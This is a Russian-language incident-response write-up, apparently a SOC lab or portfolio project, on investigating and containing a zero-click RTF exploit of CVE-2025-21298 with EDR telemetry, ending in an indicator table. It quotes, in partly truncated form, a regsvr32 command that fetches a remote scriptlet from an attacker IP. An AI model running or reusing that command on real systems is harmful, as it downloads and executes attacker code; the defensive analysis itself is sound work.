
Техническое расследование и локализация хоста для RCE-эксплойта нулевого клика критической степени опасности (CVE-2025-21298) с использованием телеметрии EDR и статического анализа вредоносного ПО.
Этот проект документирует сквозное расследование и сдерживание попытки удаленного выполнения кода (RCE) нулевого клика критической степени серьезности. Используя телеметрию EDR и разведку угроз, я идентифицировал атаку "Living off the Land" (LotL), которая обошла автоматические защиты и установила связь с командным центром (C2).
Я идентифицировал событие с ID 314: Обнаружение Windows OLE Zero-Click RCE. Первоначальная телеметрия показала, что вредоносный файл mail.rtf был Разрешён периметровыми защитами, что указывает на активную компрометацию рабочей станции 'Austin'.

Я выполнил проверку репутации хеша файла на VirusTotal. Результаты подтвердили уровень обнаружения 25/55, конкретно идентифицируя файл как вредоносный RTF, использующий CVE-2025-21298. Эта уязвимость позволяет удалённо выполнять код через панель предварительного просмотра Windows без взаимодействия с пользователем.

Я переключился на историю терминала EDR для хоста 'Austin', чтобы выявить постэксплуатационное поведение. Я обнаружил вредоносное выполнение "Living off the Land" (LotL):
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) для получения вредоносного скриптлета с удалённого сервера, обходя стандартную белую список приложений и традиционные антивирусные сигнатуры.

Следуя структуре реагирования на инциденты NIST, приоритет был отдан немедленному сдерживанию. Я выполнил изоляцию сети на поражённом хосте для прекращения связи C2 и предотвращения бокового перемещения в корпоративной сети.

Инцидент был закрыт как True Positive. Я задокументировал IP-адрес злоумышленника (84.38.130.118) и криминалистические доказательства для команд разведки угроз и межсетевого экрана, чтобы предотвратить будущие инциденты.

| Type | Value |
|---|
| C2 IP-адрес | 84.38.130.118 |
| Хеш файла (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Уязвимость | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |